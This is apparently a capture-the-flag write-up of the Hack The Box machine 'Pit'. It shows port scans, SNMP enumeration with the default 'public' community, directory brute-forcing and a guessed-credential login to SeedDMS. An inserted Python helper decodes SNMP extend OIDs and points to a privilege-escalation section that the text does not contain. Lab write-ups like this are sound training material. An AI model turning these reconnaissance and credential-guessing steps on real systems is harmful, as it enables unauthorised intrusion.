Pit
Completed on September 21, 2021
Pit is a Linux-based HTB machine that in some ways relies on the typical entry points, SSH and HTTP, to get into the system. The twist is a third service which, quite frankly, I had barely used until now. It just emphasizes that you should never stop learning.
As a spoiler, the name of this box relates to Cockpit. I would Google that if I were you!
As we need to know exactly what we are dealing with in terms of available services, we first run nmap in a way that only reports open ports (all 65535 of them, no version probing yet), so that the slower service scan can later be limited to just those.
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> nmap -p- --min-rate=1000 -T4 pit.htb -oN Pit_OpenPort.log -oX Pit_OpenPorts.xml
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-18 23:41 EDT
Nmap scan report for pit.htb (10.129.219.56)
Host is up (0.039s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9090/tcp open zeus-admin
Nmap done: 1 IP address (1 host up) scanned in 122.64 seconds
As mentioned in the overview, we have SSH and HTTP accessible, but we also have TCP 9090. To make it easier on ourselves, we build a comma-separated port list from the 'open port' log file and feed it to the service and script scan.
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> PORTS=$(cat Pit_OpenPort.log | grep tcp | cut -d "/" -f1 | xargs | tr " " ",")
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> nmap -sC -sV pit.htb -p $PORTS -oN Pit_PortScan.log -oX Pit_PortScan.xml
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-18 23:47 EDT
Nmap scan report for pit.htb (10.129.219.56)
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
| 256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_ 256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
| vulners:
| cpe:/a:openbsd:openssh:8.0:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| CVE-2019-16905 4.4 https://vulners.com/cve/CVE-2019-16905
| MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/ *EXPLOIT*
| MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/ *EXPLOIT*
|_ CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
80/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
| vulners:
| cpe:/a:igor_sysoev:nginx:1.14.1:
| CVE-2019-9513 7.8 https://vulners.com/cve/CVE-2019-9513
| CVE-2019-9511 7.8 https://vulners.com/cve/CVE-2019-9511
| CVE-2021-23017 7.5 https://vulners.com/cve/CVE-2021-23017
| 1337DAY-ID-36300 7.5 https://vulners.com/zdt/1337DAY-ID-36300 *EXPLOIT*
| CVE-2019-9516 6.8 https://vulners.com/cve/CVE-2019-9516
| CVE-2018-16845 5.8 https://vulners.com/cve/CVE-2018-16845
|_ PACKETSTORM:162830 0.0 https://vulners.com/packetstorm/PACKETSTORM:162830 *EXPLOIT*
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after: 2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.22 seconds
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -vk -I http://pit.htb:9090 2>&1
* Trying 10.129.95.189:9090...
* Connected to pit.htb (10.129.95.189) port 9090 (#0)
> HEAD / HTTP/1.1
> Host: pit.htb:9090
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
HTTP/1.1 301 Moved Permanently
< Content-Type: text/html
Content-Type: text/html
< Location: https://pit.htb:9090/
Location: https://pit.htb:9090/
< Content-Length: 73
Content-Length: 73
< X-DNS-Prefetch-Control: off
X-DNS-Prefetch-Control: off
< Referrer-Policy: no-referrer
Referrer-Policy: no-referrer
< X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
< Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
<
* Excess found: excess = 73 url = / (zero-length body)
* Connection #0 to host pit.htb left intact
Let's retrieve the certificate content by using curl:
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -vkL -I https://pit.htb:9090 2>&1
* Trying 10.129.95.189:9090...
* Connected to pit.htb (10.129.95.189) port 9090 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: /etc/ssl/certs/ca-certificates.crt
* CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
* subject: C=US; O=4cd9329523184b0ea52ba0d20a1a6f92; CN=dms-pit.htb
* start date: Apr 16 23:29:12 2020 GMT
* expire date: Jun 4 16:09:12 2030 GMT
* issuer: C=US; O=4cd9329523184b0ea52ba0d20a1a6f92; OU=ca-5763051739999573755; CN=dms-pit.htb
* SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> HEAD / HTTP/1.1
> Host: pit.htb:9090
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Content-Type: text/html
Content-Type: text/html
< Content-Security-Policy: connect-src 'self' https://pit.htb:9090 wss://pit.htb:9090; form-action 'self' https://pit.htb:9090; base-uri 'self' https://pit.htb:9090; object-src 'none'; font-src 'self' https://pit.htb:9090 data:; img-src 'self' https://pit.htb:9090 data:; block-all-mixed-content; default-src 'self' https://pit.htb:9090 'unsafe-inline'
Content-Security-Policy: connect-src 'self' https://pit.htb:9090 wss://pit.htb:9090; form-action 'self' https://pit.htb:9090; base-uri 'self' https://pit.htb:9090; object-src 'none'; font-src 'self' https://pit.htb:9090 data:; img-src 'self' https://pit.htb:9090 data:; block-all-mixed-content; default-src 'self' https://pit.htb:9090 'unsafe-inline'
< Set-Cookie: cockpit=deleted; PATH=/; Secure; HttpOnly
Set-Cookie: cockpit=deleted; PATH=/; Secure; HttpOnly
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Cache-Control: no-cache, no-store
Cache-Control: no-cache, no-store
< X-DNS-Prefetch-Control: off
X-DNS-Prefetch-Control: off
< Referrer-Policy: no-referrer
Referrer-Policy: no-referrer
< X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
< Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
<
* Excess found: excess = 5 url = / (zero-length body)
* Connection #0 to host pit.htb left intact
The certificate names another host, dms-pit.htb, as its CN and in its Subject Alternative Name, which nmap's ssl-cert script had already shown:
* Server certificate:
* subject: C=US; O=4cd9329523184b0ea52ba0d20a1a6f92; CN=dms-pit.htb
* start date: Apr 16 23:29:12 2020 GMT
* expire date: Jun 4 16:09:12 2030 GMT
* issuer: C=US; O=4cd9329523184b0ea52ba0d20a1a6f92; OU=ca-5763051739999573755; CN=dms-pit.htb
Let's add this to our hosts file and retest against both TCP 80 and 9090.
Example:
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> cat /etc/hosts | grep -i pit
10.129.220.187 pit.htb dms-pit.htb
With that name in place, TCP 9090 serves the same Cockpit page, BUT TCP 80 now answers with a 403 instead of the nginx test page, so nginx has a separate server block for this vhost. Let's see what we can find there:
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> dirb http://dms-pit.htb/ /opt/seclists/Discovery/Web-Content/common.txt -t -l -N 401,403,404 -f -w -o Pit_dirb.txt -p http://127.0.0.1:8080
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: Pit_dirb.txt
START_TIME: Sun Sep 19 11:34:15 2021
URL_BASE: http://dms-pit.htb/
WORDLIST_FILES: /opt/seclists/Discovery/Web-Content/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Printing LOCATION header
OPTION: Ignoring NOT_FOUND code -> 401
PROXY: http://127.0.0.1:8080
OPTION: NOT forcing an ending '/' on URLs
OPTION: Not Stopping on warning messages
-----------------
GENERATED WORDS: 4696
---- Scanning URL: http://dms-pit.htb/ ----
+ http://dms-pit.htb/WS_FTP.LOG (CODE:403|SIZE:571)
+ http://dms-pit.htb/akeeba.backend.log (CODE:403|SIZE:571)
+ http://dms-pit.htb/crossdomain.xml (CODE:403|SIZE:571)
+ http://dms-pit.htb/development.log (CODE:403|SIZE:571)
+ http://dms-pit.htb/production.log (CODE:403|SIZE:571)
+ http://dms-pit.htb/sitemap.xml (CODE:403|SIZE:571)
+ http://dms-pit.htb/spamlog.log (CODE:403|SIZE:571)
+ http://dms-pit.htb/web.xml (CODE:403|SIZE:571)
-----------------
END_TIME: Sun Sep 19 11:44:07 2021
DOWNLOADED: 4696 - FOUND: 8
So we get nowhere: every hit is a 403. Given nginx 1.14.1 has some vulnerabilities and one of them (CVE-2021-23017, in the nginx DNS resolver) involves UDP DNS traffic, let's look for any UDP ports this host might be listening on. For this we use masscan against all ports, TCP and UDP, to get a quick answer.
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> sudo masscan -e tun1 -p1-65535,U:1-65535 10.129.95.189 --rate=1000 | tee Pit_masscan.log
[sudo] password for htb:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-09-19 16:00:01 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.129.95.189
Discovered open port 9090/tcp on 10.129.95.189
Discovered open port 161/udp on 10.129.95.189
Discovered open port 80/tcp on 10.129.95.189
The result does not confirm our hunch about the nginx resolver and UDP DNS, but it does uncover that SNMP (UDP 161) is reachable.
Let's query it with snmp-check, which tries SNMPv1 with the default community string 'public':
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> snmp-check 10.129.95.189
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.129.95.189:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 10.129.95.189
Hostname : pit.htb
Description : Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
Contact : Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
Location : Unknown (edit /etc/snmp/snmpd.conf)
Uptime snmp : 00:47:31.51
Uptime system : 00:47:00.48
System date : -
[*] Processes:
Id Status Name Path Parameters
1 runnable systemd /usr/lib/systemd/systemd --switched-root --system --deserialize 17
...
822 runnable systemd-journal /usr/lib/systemd/systemd-journald
857 runnable systemd-udevd /usr/lib/systemd/systemd-udevd
914 unknown kdmflush
918 unknown nfit
932 unknown xfs-buf/dm-2
933 unknown xfs-conv/dm-2
934 unknown xfs-cil/dm-2
935 unknown xfs-reclaim/dm-
936 unknown xfs-eofblocks/d
937 unknown xfs-log/dm-2
938 runnable xfsaild/dm-2
943 runnable jbd2/sda1-8
944 unknown ext4-rsv-conver
967 runnable auditd /sbin/auditd
969 runnable sedispatch /usr/sbin/sedispatch
1000 runnable VGAuthService /usr/bin/VGAuthService -s
1002 runnable vmtoolsd /usr/bin/vmtoolsd
1003 runnable dbus-daemon /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
1005 runnable irqbalance /usr/sbin/irqbalance --foreground
1006 runnable sssd /usr/sbin/sssd -i --logger=files
1009 runnable polkitd /usr/lib/polkit-1/polkitd --no-debug
1013 runnable chronyd /usr/sbin/chronyd
1021 runnable rngd /sbin/rngd -f --fill-watermark=0
1042 runnable sssd_be /usr/libexec/sssd/sssd_be --domain implicit_files --uid 0 --gid 0 --logger=files
1051 runnable sssd_nss /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
1052 runnable firewalld /usr/libexec/platform-python -s /usr/sbin/firewalld --nofork --nopid
1080 runnable systemd-logind /usr/lib/systemd/systemd-logind
1091 runnable NetworkManager /usr/sbin/NetworkManager --no-daemon
1097 runnable tuned /usr/libexec/platform-python -Es /usr/sbin/tuned -l -P
1098 runnable sshd /usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128
1143 runnable crond /usr/sbin/crond -n
1167 runnable nginx nginx: master process /usr/sbin/nginx
1168 runnable nginx nginx: worker process
1169 runnable nginx nginx: worker process
1180 runnable agetty /sbin/agetty -o -p -- \u --noclear tty1 linux
1201 runnable mysqld /usr/libexec/mysqld --basedir=/usr
1468 running snmpd /usr/sbin/snmpd -LS0-6d -f
1470 runnable rsyslogd /usr/sbin/rsyslogd -n
1713 unknown kworker/1:0-cgroup_destroy
1754 unknown kworker/u4:0-xfs-cil/dm-0
1870 unknown kworker/1:5-events
1983 unknown kworker/u4:1-events_unbound
2043 unknown kworker/0:0-cgroup_destroy
2170 unknown kworker/1:1-events
2173 unknown kworker/0:1-cgroup_pidlist_destroy
2194 unknown kworker/0:3-events_power_efficient
2233 runnable anacron /usr/sbin/anacron -s
2245 unknown kworker/1:2-cgroup_pidlist_destroy
2269 runnable php-fpm php-fpm: master process (/etc/php-fpm.conf)
2270 runnable php-fpm php-fpm: pool www
2271 runnable php-fpm php-fpm: pool www
2272 runnable php-fpm php-fpm: pool www
2273 runnable php-fpm php-fpm: pool www
2274 runnable php-fpm php-fpm: pool www
2277 unknown kworker/u4:2-events_unbound
2281 unknown kworker/1:3-events
Even though the process list was truncated, it gave us some good information on what is going on in this box.
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> /opt/snmp/snmpbw.pl pit.htb public 2 1
SNMP query: 10.129.95.189
Queue count: 0
SNMP SUCCESS: 10.129.95.189
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> #It's output!
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> grep var 10.129.95.189.snmp
.1.3.6.1.4.1.2021.9.1.2.2 = STRING: "/var/www/html/seeddms51x/seeddms"
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.31 = No more variables left in this MIB View (It is past the end of the MIB tree)
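The second OID above is easier to read once its index is decoded. The following is an added example, not part of the original write-up: it parses the 'OID = TYPE: value' lines of an snmpwalk or snmpbw.pl dump and decodes the NET-SNMP-EXTEND-MIB entries by hand, so that .1.3.6.1.4.1.8072.1.3.2.2.1.2.10.109.111.110.105.116.111.114.105.110.103 reads as nsExtendCommand."monitoring" (the same line is quoted again in the privilege-escalation part below, and this serves that passage too). The sample dump is constructed from the values shown on this page; the column numbers are taken from NET-SNMP-EXTEND-MIB and nothing else is assumed.

```python
import re

NS_EXTEND_OBJECTS = "1.3.6.1.4.1.8072.1.3.2"   # NET-SNMP-EXTEND-MIB::nsExtendObjects

# (table, column) -> column name, as the sub-identifiers appear right after the
# nsExtendObjects prefix.  Table 2 is the config table (indexed by token),
# table 3 the full-output table, table 4 the per-line output table (token, line).
EXTEND_COLUMNS = {
    ("2", "2"): "nsExtendCommand",
    ("2", "3"): "nsExtendArgs",
    ("2", "4"): "nsExtendInput",
    ("2", "5"): "nsExtendCacheTime",
    ("2", "6"): "nsExtendExecType",
    ("2", "7"): "nsExtendRunType",
    ("3", "2"): "nsExtendOutputFull",
    ("3", "4"): "nsExtendResult",
    ("4", "2"): "nsExtendOutLine",
}

# nsExtendRunType: 1 means the command is executed every time its OIDs are read.
RUN_TYPES = {"1": "run-on-read", "2": "run-on-set"}

LINE_RE = re.compile(r"^\.?(?P<oid>\d+(?:\.\d+)+)\s*=\s*(?P<rest>.*)$")
TYPE_RE = re.compile(r"[A-Za-z][A-Za-z0-9 -]*")


def parse_line(line):
    """Split one 'OID = TYPE: value' line into (oid, type, value).

    Lines with no 'TYPE:' part, such as the 'No more variables left in this
    MIB View' marker, come back with type None.  Lines that do not start with
    an OID return None.
    """
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    oid, rest = m.group("oid"), m.group("rest")
    typ, sep, val = rest.partition(":")
    if not sep or not TYPE_RE.fullmatch(typ):
        return oid, None, rest
    val = val.strip()
    if typ == "STRING" and len(val) >= 2 and val[0] == val[-1] == '"':
        val = val[1:-1]          # snmpbw.pl quotes strings, snmpwalk does not
    return oid, typ, val


def decode_string_index(parts):
    """Decode a length-prefixed OCTET STRING table index.

    SNMP encodes a string index as its length followed by one sub-identifier
    per byte, so 10.109.111.110.105.116.111.114.105.110.103 is "monitoring".
    Returns (text, remaining sub-identifiers).
    """
    if not parts:
        raise ValueError("empty index")
    n = int(parts[0])
    if n > len(parts) - 1:
        raise ValueError("index length %d exceeds OID" % n)
    text = bytes(int(p) for p in parts[1:1 + n]).decode("ascii")
    return text, parts[1 + n:]


def decode_extend(oid):
    """Map a numeric OID under nsExtendObjects to (column, token, extra index).

    Returns None for OIDs outside the extend subtree.
    """
    prefix = NS_EXTEND_OBJECTS + "."
    if not oid.startswith(prefix):
        return None
    parts = oid[len(prefix):].split(".")
    if len(parts) < 4:           # table, entry, column and at least a length
        return None
    table, column = parts[0], parts[2]
    name = EXTEND_COLUMNS.get((table, column), "table%s.col%s" % (table, column))
    token, rest = decode_string_index(parts[3:])
    return name, token, [int(p) for p in rest]


def summarize_extend(dump_lines):
    """Collect, per extend token, the config columns seen in the dump.

    Output rows (nsExtendOutLine / nsExtendOutputFull) are skipped: they can be
    long and are not needed to see what snmpd will execute and when.
    """
    summary = {}
    for line in dump_lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        oid, typ, val = parsed
        decoded = decode_extend(oid)
        if decoded is None or typ is None:
            continue
        column, token, _extra = decoded
        if column in ("nsExtendOutLine", "nsExtendOutputFull"):
            continue
        if column == "nsExtendRunType":
            val = RUN_TYPES.get(val.split("(")[0], val)
        summary.setdefault(token, {})[column] = val
    return summary


# Constructed sample in snmpbw.pl output format, using the values visible in
# the dump on this page.
SAMPLE_DUMP = """\
.1.3.6.1.2.1.1.5.0 = STRING: "pit.htb"
.1.3.6.1.4.1.2021.9.1.2.2 = STRING: "/var/www/html/seeddms51x/seeddms"
.1.3.6.1.4.1.8072.1.3.2.2.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: "/usr/bin/monitor"
.1.3.6.1.4.1.8072.1.3.2.2.1.5.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: 5
.1.3.6.1.4.1.8072.1.3.2.2.1.7.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: 1
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.31 = No more variables left in this MIB View (It is past the end of the MIB tree)
"""

if __name__ == "__main__":
    for token, cols in summarize_extend(SAMPLE_DUMP.splitlines()).items():
        print(token, cols)
```

Run against the real dump with `summarize_extend(open("10.129.95.189.snmp"))`; a token whose nsExtendRunType is run-on-read is a command snmpd executes on every read of its OIDs, which is what the privilege escalation later relies on.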
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -vkL -I http://dms-pit.htb/seeddms51x/seeddms
* Trying 10.129.95.189:80...
* Connected to dms-pit.htb (10.129.95.189) port 80 (#0)
> HEAD /seeddms51x/seeddms HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
HTTP/1.1 301 Moved Permanently
< Server: nginx/1.14.1
Server: nginx/1.14.1
< Date: Sun, 19 Sep 2021 17:27:50 GMT
Date: Sun, 19 Sep 2021 17:27:50 GMT
< Content-Type: text/html
Content-Type: text/html
< Content-Length: 185
Content-Length: 185
< Location: http://dms-pit.htb/seeddms51x/seeddms/
Location: http://dms-pit.htb/seeddms51x/seeddms/
< Connection: keep-alive
Connection: keep-alive
<
* Connection #0 to host dms-pit.htb left intact
* Issue another request to this URL: 'http://dms-pit.htb/seeddms51x/seeddms/'
* Found bundle for host dms-pit.htb: 0x55a04a122b60 [serially]
* Can not multiplex, even if we wanted to!
* Re-using existing connection! (#0) with host dms-pit.htb
* Connected to dms-pit.htb (10.129.95.189) port 80 (#0)
> HEAD /seeddms51x/seeddms/ HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
HTTP/1.1 302 Found
< Server: nginx/1.14.1
Server: nginx/1.14.1
< Date: Sun, 19 Sep 2021 17:27:50 GMT
Date: Sun, 19 Sep 2021 17:27:50 GMT
< Content-Type: text/html; charset=UTF-8
Content-Type: text/html; charset=UTF-8
< Connection: keep-alive
Connection: keep-alive
< X-Powered-By: PHP/7.2.24
X-Powered-By: PHP/7.2.24
< Location: /seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2F
Location: /seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2F
<
* Connection #0 to host dms-pit.htb left intact
* Issue another request to this URL: 'http://dms-pit.htb/seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2F'
* Found bundle for host dms-pit.htb: 0x55a04a122b60 [serially]
* Can not multiplex, even if we wanted to!
* Re-using existing connection! (#0) with host dms-pit.htb
* Connected to dms-pit.htb (10.129.95.189) port 80 (#0)
> HEAD /seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2F HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Server: nginx/1.14.1
Server: nginx/1.14.1
< Date: Sun, 19 Sep 2021 17:27:50 GMT
Date: Sun, 19 Sep 2021 17:27:50 GMT
< Content-Type: text/html; charset=UTF-8
Content-Type: text/html; charset=UTF-8
< Connection: keep-alive
Connection: keep-alive
< X-Powered-By: PHP/7.2.24
X-Powered-By: PHP/7.2.24
< X-WebKit-CSP: script-src 'self' 'unsafe-eval'; worker-src blob:;
X-WebKit-CSP: script-src 'self' 'unsafe-eval'; worker-src blob:;
< X-Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
X-Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
< Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
<
* Connection #0 to host dms-pit.htb left intact
And we are hitting the login page of SeedDMS, an open-source document management system.
Since we have no credentials, we go back to the SNMP dump. The only user it names is 'michelle', in the SELinux login mapping printed by the 'monitoring' extend command, but there is no password anywhere:
"Memory usage
              total        used        free      shared  buff/cache   available
Mem:          3.8Gi       328Mi       3.2Gi       8.0Mi       276Mi       3.3Gi
Swap:         1.9Gi          0B       1.9Gi
Database status
OK - Connection to database successful.
System release info
CentOS Linux release 8.3.2011
SELinux Settings
user
                Labeling   MLS/       MLS/
SELinux User    Prefix     MCS Level  MCS Range                      SELinux Roles
guest_u         user       s0         s0                             guest_r
root            user       s0         s0-s0:c0.c1023                 staff_r sysadm_r system_r unconfined_r
staff_u         user       s0         s0-s0:c0.c1023                 staff_r sysadm_r unconfined_r
sysadm_u        user       s0         s0-s0:c0.c1023                 sysadm_r
system_u        user       s0         s0-s0:c0.c1023                 system_r unconfined_r
unconfined_u    user       s0         s0-s0:c0.c1023                 system_r unconfined_r
user_u          user       s0         s0                             user_r
xguest_u        user       s0         s0                             xguest_r
login
Login Name           SELinux User         MLS/MCS Range        Service
__default__          unconfined_u         s0-s0:c0.c1023       *
michelle             user_u               s0                   *
root                 unconfined_u         s0-s0:c0.c1023       *
System uptime
13:21:30 up 2:03, 0 users, load average: 0.00, 0.00, 0.00"
We can start by trying michelle:michelle. Let's attempt a login and see what happens:
┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -vkL -X POST http://dms-pit.htb/seeddms51x/seeddms/op/op.Login.php \
-H "Content-Type: application/x-www-form-urlencoded" \
--proxy http://127.0.0.1:8080 \
> --data "login=michelle&pwd=michelle&lang=en_GB"
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> POST http://dms-pit.htb/seeddms51x/seeddms/op/op.Login.php HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 38
>
* upload completely sent off: 38 out of 38 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Server: nginx/1.14.1
< Date: Mon, 20 Sep 2021 01:27:29 GMT
< Content-Type: text/html; charset=UTF-8
< Connection: close
< X-Powered-By: PHP/7.2.24
< Set-Cookie: mydms_session=0f66afe88c0e0fe171df8797c83dd346; path=/seeddms51x/seeddms/; HttpOnly
< Location: /seeddms51x/seeddms/out/out.ViewFolder.php?folderid=1
< Content-Length: 0
<
* Closing connection 0
* Issue another request to this URL: 'http://dms-pit.htb/seeddms51x/seeddms/out/out.ViewFolder.php?folderid=1'
* Switch from POST to GET
* Hostname 127.0.0.1 was found in DNS cache
* Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#1)
> POST http://dms-pit.htb/seeddms51x/seeddms/out/out.ViewFolder.php?folderid=1 HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Server: nginx/1.14.1
< Date: Mon, 20 Sep 2021 01:27:39 GMT
< Content-Type: text/html; charset=UTF-8
< Connection: close
< X-Powered-By: PHP/7.2.24
< Location: /seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2Fout%2Fout.ViewFolder.php%3Ffolderid%3D1
< Content-Length: 0
<
* Closing connection 1
* Issue another request to this URL: 'http://dms-pit.htb/seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2Fout%2Fout.ViewFolder.php%3Ffolderid%3D1'
* Hostname 127.0.0.1 was found in DNS cache
* Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#2)
> POST http://dms-pit.htb/seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2Fout%2Fout.ViewFolder.php%3Ffolderid%3D1 HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.14.1
< Date: Mon, 20 Sep 2021 01:27:50 GMT
< Content-Type: text/html; charset=UTF-8
< Connection: close
< X-Powered-By: PHP/7.2.24
< X-WebKit-CSP: script-src 'self' 'unsafe-eval'; worker-src blob:;
< X-Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
< Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
< Content-Length: 7449
